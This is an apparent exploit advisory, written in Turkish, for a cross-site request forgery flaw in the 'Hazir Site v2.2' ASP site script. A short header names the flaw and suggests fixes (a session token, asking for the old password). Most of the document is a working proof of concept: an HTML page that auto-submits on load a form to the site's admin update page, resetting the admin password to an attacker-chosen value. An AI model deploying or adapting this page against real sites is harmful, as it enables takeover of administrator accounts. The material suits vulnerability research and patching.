< ------------------- header data start ------------------- >

#############################################################

# Application Name : Hazir Site v2.2

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers

# Script Download : http://www.aspindir.com/goster/2728

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<bOdy onLoad=Submit();>
<script>function Submit(){document.Sh0cK.submit();}</script>

<form action=http://www.Site.com/[Path]/idare_guncelle.asp name=Sh0cK method=post>
<input class=input type=text name=user size=28 value=admin>
<input class=input type=password name=pass size=28 value=Yenisifre>
<input class=input type=text name=site_adi size=28 value=ISTANBUL GRAFIK>
<input class=input type=text name=logo size=28 value=>
<input class=input type=text name=logourl size=28 value=>
<input class=input type=text name=banner_adi size=28 value=ISTANBUL GRAFIK>
<input class=input type=text name=banner size=28 value=imaj/istanbullogo.jpg>
<input class=input type=text name=bannerurl size=28 value=default.asp>
<input class=input type=text name=iletisim size=28 value=[email protected]>

<input type=submit value=Lütfen Bekleyiniz.></form>

< -- bug code end of -- >